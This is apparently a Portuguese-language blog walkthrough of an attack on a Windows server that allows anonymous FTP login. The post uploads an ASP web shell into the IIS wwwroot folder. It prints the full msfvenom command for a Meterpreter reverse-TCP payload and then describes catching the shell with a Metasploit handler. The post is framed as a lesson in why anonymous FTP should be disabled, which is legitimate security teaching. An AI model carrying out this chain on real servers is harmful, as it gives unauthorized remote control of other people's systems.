Explorando FTP na Prática

Fala ai galerinha, hoje vamos entender como é importante manter o acesso anônimo do FTP desabilitado.

1 – Vamos escanear o host 192.168.1.5 para validar se a porta 21 esta aberta.

Bom, descobrimos que o host é windows e esta rodando um servidor FTP.

2 – Vamos tentar fazer login como anonymous/anonymous out ftp/ftp para validar se o acesso anônimo esta habilitado.

Perfeito, conseguimos acesso ao host, agora podemos fazer uma busca por diretórios ou arquivos sensíveis.

3 – Ao listar o diretórios encontramos algo interessante.

\0/, o wwwroot é o diretório raiz do servidor WEB IIS. Oque será que acontece se subirmos uma shell e tentar acessar através do browser?, vamos testar.

4 – Vamos criar uma shell reversa com msfvenon, por ser um servidor Windows, vamos criar em .ASP

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=”192.168.1.5″ LPORT=8444 -f asp > shell.asp

5 – Agora vamos subir a shell via ftp.

Yep, agora precisamos preparar o nosso host para recebera conexão reversa.

6 – Vamos utilizar o metasploit (use exploit/multi/handler ).

Vamos definir o LHOST,LPORT e definir o PAYLOAD(lembrando que o payload deve ser o mesmo criado para a shell anteriormente).

Agora vamos iniciar o exploit para ele ficar aguardando conexão na porta 8444.

7 – Vamos executar a shell através do browser.

olha só, agora temos uma shell dentro do servidor com meterpreter.

E ai, Gostou?, deixe seu comentário e me siga nas redes sociais.

Nos vemos em breve, Até Mais……